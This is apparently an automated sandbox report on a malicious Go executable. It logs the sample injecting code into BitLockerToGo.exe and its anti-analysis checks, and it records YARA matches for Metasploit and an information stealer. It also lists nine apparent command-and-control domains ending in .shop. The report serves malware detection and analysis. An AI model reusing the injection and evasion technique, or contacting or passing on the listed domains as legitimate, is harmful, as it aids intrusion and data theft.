                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B07400 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_02B07400

                System Summary

                barindex
                Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B0E4684_2_02B0E468
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B0DEE84_2_02B0DEE8
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AED26A4_2_02AED26A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B0D2404_2_02B0D240
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AD13B84_2_02AD13B8
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AD131E4_2_02AD131E
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AD83404_2_02AD8340
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AEE35A4_2_02AEE35A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B170904_2_02B17090
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AFB0D74_2_02AFB0D7
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02ADB0304_2_02ADB030
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AFC0074_2_02AFC007
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AD10004_2_02AD1000
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AFA0704_2_02AFA070
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B071B04_2_02B071B0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B1618A4_2_02B1618A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AFC1CD4_2_02AFC1CD
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B181204_2_02B18120
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B056B04_2_02B056B0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AD36A04_2_02AD36A0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AD979A4_2_02AD979A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B197204_2_02B19720
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AE076F4_2_02AE076F
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B185A24_2_02B185A2
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AF658F4_2_02AF658F
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02ADA5104_2_02ADA510
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B175704_2_02B17570
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AECA104_2_02AECA10
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B17BB04_2_02B17BB0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AF7BA64_2_02AF7BA6
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02ADABA04_2_02ADABA0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AFDB9C4_2_02AFDB9C
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AD6BF04_2_02AD6BF0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02ADBB404_2_02ADBB40
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B156C94_2_02B156C9
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02ADC8104_2_02ADC810
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B138404_2_02B13840
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AD79A04_2_02AD79A0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B17E904_2_02B17E90
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AD4E504_2_02AD4E50
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AD6FA04_2_02AD6FA0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AD9FC04_2_02AD9FC0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AE0F204_2_02AE0F20
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AD8DA04_2_02AD8DA0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AFDD674_2_02AFDD67
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B12DE04_2_02B12DE0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B00DD04_2_02B00DD0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B17D004_2_02B17D00
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02AFDD674_2_02AFDD67
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B17D6B4_2_02B17D6B
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 02ADC620 appears 43 times
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 02ADE8C0 appears 132 times
                Source: p37SE6gM52.exeStatic PE information: Number of sections : 12 > 10
                Source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000688000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs p37SE6gM52.exe
                Source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C00064E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs p37SE6gM52.exe
                Source: p37SE6gM52.exe, 00000001.00000000.1325186248.00007FF6FD5EE000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDisplayTool.exe8 vs p37SE6gM52.exe
                Source: p37SE6gM52.exe, 00000001.00000003.1710429168.000002766ED60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs p37SE6gM52.exe
                Source: p37SE6gM52.exeBinary or memory string: OriginalFilenameDisplayTool.exe8 vs p37SE6gM52.exe
                Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                Source: classification engineClassification label: mal100.troj.evad.winEXE@3/0@2/1
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B0DE76 CoCreateInstance,GetVolumeInformationW,4_2_02B0DE76
                Source: C:\Users\user\Desktop\p37SE6gM52.exeFile created: C:\Users\Public\Libraries\dbncj.scifJump to behavior
                Source: p37SE6gM52.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\p37SE6gM52.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: p37SE6gM52.exeReversingLabs: Detection: 52%
                Source: p37SE6gM52.exeString found in binary or memory: pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero p
                Source: p37SE6gM52.exeString found in binary or memory: pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero p
                Source: p37SE6gM52.exeString found in binary or memory: (this is measured directly in /sched/pauses/stopping/gc:seconds), during which some threads may still be running. Bucket counts increase monotonically.Estimated total CPU time spent performing GC tasks on spare CPU resources that the Go scheduler could not ot
                Source: p37SE6gM52.exeString found in binary or memory: (this is measured directly in /sched/pauses/stopping/gc:seconds), during which some threads may still be running. Bucket counts increase monotonically.Estimated total CPU time spent performing GC tasks on spare CPU resources that the Go scheduler could not ot
                Source: p37SE6gM52.exeString found in binary or memory: rom deciding to stop the world until the world is started again. Some of this time is spent getting all threads to stop (measured directly in /sched/pauses/stopping/other:seconds). Bucket counts increase monotonically.Distribution of individual GC-related stop
                Source: p37SE6gM52.exeString found in binary or memory: rom deciding to stop the world until the world is started again. Some of this time is spent getting all threads to stop (measured directly in /sched/pauses/stopping/other:seconds). Bucket counts increase monotonically.Distribution of individual GC-related stop
                Source: p37SE6gM52.exeString found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
                Source: p37SE6gM52.exeString found in binary or memory: net/addrselect.go
                Source: p37SE6gM52.exeString found in binary or memory: error.in-addr.arpa.unknown mode: unreachable: /log/filter.go/log/helper.godata truncated ... omitting case_not_founddata_exceptiongrouping_errorquery_canceledadmin_shutdowncrash_shutdownundefined_fileduplicate_filefdw_no_schemasinternal_errordata_corruptedpos
                Source: p37SE6gM52.exeString found in binary or memory: ifRmlZMLlG/load.go
                Source: p37SE6gM52.exeString found in binary or memory: runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine .localhostwsarecvmsgwsasendmsgIP addressunixpacket netGo = RIPEMD-160ChorasmianDevanagariGlagoliticKharoshthiManichaeanOld_ItalicOld_PermicOld_TurkicOld_UyghurPhoenicianSaurashtraSHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1POSTALCODEexecerrdotSYSTEMROOT for type trim_errorPGPASSFILEkrbsrvname READ ONLYdecode: %sConnectionlocal-addrUser-AgentRST_STREAMEND_STREAMSet-Cookie stream=%dset-cookieuser-agentkeep-alive:authorityconnectionequivalentHost: %s
                Source: p37SE6gM52.exeString found in binary or memory: stopm spinning nmidlelocked= needspinning=randinit twicestore64 failedsemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module data in goroutine runtime: seq1=runtime: goid=RegSetValueExWinternal error.in-addr.arpa.unknown mode: unreachable: /log/filter.go/log/helper.godata truncated
                Source: p37SE6gM52.exeString found in binary or memory: too many Questions to pack (>65535)transform: short destination buffermime: bogus characters after %%: %qhpack: invalid Huffman-encoded datadynamic table size update too largemlkem768: crypto/rand Read failed: mlkem768: invalid ciphertext lengthcbor: invalid ByteSliceLaterFormat P224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitymissing EncodeTime in EncoderConfigcannot create scope info metric: %wmanual reader: invalid producer: %Tduplicate list-member in tracestatetoo many list-members in tracestatego.opentelemetry.io/otel/sdk/tracerdelimiters may only be "{}" or "<>"string field contains invalid UTF-8%v already implements proto.Messageflate: corrupt input before offset range can only initialize variablesexpected unsigned integer; found %snon-comparable types %s: %v, %s: %vcannot use an unfiltered option: %vambiguous set of applicable optionschacha20: output smaller than inputGOMEMLIMIT is already set, skippingprocess.runtime.go.mem.heap_objectsprocess.runtime.go.mem.live_objectsAGGREGATION_TEMPORALITY_UNSPECIFIEDno ErrorHandler delegate configuredprocess_network_receive_bytes_totalgrpc.internal.transport.networktypethere is an empty key in the headerGRPC_ALTS_MAX_CONCURRENT_HANDSHAKES%s: none of the oneof fields is setcrypto/cipher: input not full blocksTime.UnmarshalBinary: invalid lengthmethod ABI and value ABI don't alignreflect.Value.Equal: values of type strings.Builder.Grow: negative countstrings: Join output length overflowThunk Address Of Data too spread outPower PC with floating point supportCherokee United States (chr-Cher-US)Chinese (Traditional) Taiwan (zh-TW)English United Arab Emirates (en-AE)Error parsing certificate from ASN.1accessing a corrupted shared library444089209850062616169452667236328125ryuFtoaFixed64 called with prec > 180123456789abcdefghijklmnopqrstuvwxyzbytes: Repeat output length overflowbytes.Reader.ReadAt: negative offsetbytes.Reader.Seek: negative positionlfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
                Source: p37SE6gM52.exeString found in binary or memory: too many Questions to pack (>65535)transform: short destination buffermime: bogus characters after %%: %qhpack: invalid Huffman-encoded datadynamic table size update too largemlkem768: crypto/rand Read failed: mlkem768: invalid ciphertext lengthcbor: invalid ByteSliceLaterFormat P224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitymissing EncodeTime in EncoderConfigcannot create scope info metric: %wmanual reader: invalid producer: %Tduplicate list-member in tracestatetoo many list-members in tracestatego.opentelemetry.io/otel/sdk/tracerdelimiters may only be "{}" or "<>"string field contains invalid UTF-8%v already implements proto.Messageflate: corrupt input before offset range can only initialize variablesexpected unsigned integer; found %snon-comparable types %s: %v, %s: %vcannot use an unfiltered option: %vambiguous set of applicable optionschacha20: output smaller than inputGOMEMLIMIT is already set, skippingprocess.runtime.go.mem.heap_objectsprocess.runtime.go.mem.live_objectsAGGREGATION_TEMPORALITY_UNSPECIFIEDno ErrorHandler delegate configuredprocess_network_receive_bytes_totalgrpc.internal.transport.networktypethere is an empty key in the headerGRPC_ALTS_MAX_CONCURRENT_HANDSHAKES%s: none of the oneof fields is setcrypto/cipher: input not full blocksTime.UnmarshalBinary: invalid lengthmethod ABI and value ABI don't alignreflect.Value.Equal: values of type strings.Builder.Grow: negative countstrings: Join output length overflowThunk Address Of Data too spread outPower PC with floating point supportCherokee United States (chr-Cher-US)Chinese (Traditional) Taiwan (zh-TW)English United Arab Emirates (en-AE)Error parsing certificate from ASN.1accessing a corrupted shared library444089209850062616169452667236328125ryuFtoaFixed64 called with prec > 180123456789abcdefghijklmnopqrstuvwxyzbytes: Repeat output length overflowbytes.Reader.ReadAt: negative offsetbytes.Reader.Seek: negative positionlfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
                Source: p37SE6gM52.exeString found in binary or memory: net/addrselect.go
                Source: p37SE6gM52.exeString found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
                Source: p37SE6gM52.exeString found in binary or memory: google.golang.org/grpc@v1.67.0/internal/balancerload/load.go
                Source: p37SE6gM52.exeString found in binary or memory: ifRmlZMLlG/load.go
                Source: C:\Users\user\Desktop\p37SE6gM52.exeFile read: C:\Users\user\Desktop\p37SE6gM52.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\p37SE6gM52.exe "C:\Users\user\Desktop\p37SE6gM52.exe"
                Source: C:\Users\user\Desktop\p37SE6gM52.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                Source: C:\Users\user\Desktop\p37SE6gM52.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeJump to behavior
                Source: C:\Users\user\Desktop\p37SE6gM52.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\p37SE6gM52.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Users\user\Desktop\p37SE6gM52.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: p37SE6gM52.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: p37SE6gM52.exeStatic PE information: Image base 0x140000000 > 0x60000000
                Source: p37SE6gM52.exeStatic file information: File size 19140096 > 1048576
                Source: p37SE6gM52.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x859400
                Source: p37SE6gM52.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x900a00
                Source: p37SE6gM52.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: BitLockerToGo.pdb source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000688000.00000004.00001000.00020000.00000000.sdmp, p37SE6gM52.exe, 00000001.00000002.1725521935.000000C00064E000.00000004.00001000.00020000.00000000.sdmp, p37SE6gM52.exe, 00000001.00000003.1710429168.000002766ED60000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: BitLockerToGo.pdbGCTL source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000688000.00000004.00001000.00020000.00000000.sdmp, p37SE6gM52.exe, 00000001.00000002.1725521935.000000C00064E000.00000004.00001000.00020000.00000000.sdmp, p37SE6gM52.exe, 00000001.00000003.1710429168.000002766ED60000.00000004.00001000.00020000.00000000.sdmp
                Source: p37SE6gM52.exeStatic PE information: section name: .xdata
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B04EA8 push es; mov dword ptr [esp], eax4_2_02B04EB1
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B20C14 push ebx; ret 4_2_02B20C15
                Source: C:\Users\user\Desktop\p37SE6gM52.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7804Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: BitLockerToGo.exe, 00000004.00000002.1744682940.0000000002DF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                Source: BitLockerToGo.exe, 00000004.00000003.1731257436.0000000002E33000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731554267.0000000002E45000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731449847.0000000002E35000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.1744682940.0000000002E33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: p37SE6gM52.exe, 00000001.00000002.1726573970.000002762971C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllmm
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_4-19745
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B15510 LdrInitializeThunk,4_2_02B15510
                Source: C:\Users\user\Desktop\p37SE6gM52.exeProcess token adjusted: DebugJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\p37SE6gM52.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2AD0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\p37SE6gM52.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2AD0000 value starts with: 4D5AJump to behavior
                Source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: covvercilverow.shop
                Source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: surroundeocw.shop
                Source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: abortinoiwiam.shop
                Source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: pumpkinkwquo.shop
                Source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: priooozekw.shop
                Source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: deallyharvenw.shop
                Source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: defenddsouneuw.shop
                Source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: racedsuitreow.shop
                Source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: pianoswimen.shop
                Source: C:\Users\user\Desktop\p37SE6gM52.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2AD0000Jump to behavior
                Source: C:\Users\user\Desktop\p37SE6gM52.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 29C3008Jump to behavior
                Source: C:\Users\user\Desktop\p37SE6gM52.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeJump to behavior
                Source: C:\Users\user\Desktop\p37SE6gM52.exeQueries volume information: C:\Users\user\Desktop\p37SE6gM52.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\p37SE6gM52.exeQueries volume information: C:\Windows VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\p37SE6gM52.exeQueries volume information: C:\Windows\AppReadiness VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\p37SE6gM52.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\p37SE6gM52.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\p37SE6gM52.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: p37SE6gM52.exe, type: SAMPLE
                Source: Yara matchFile source: 1.0.p37SE6gM52.exe.7ff6fc380000.0.unpack, type: UNPACKEDPE
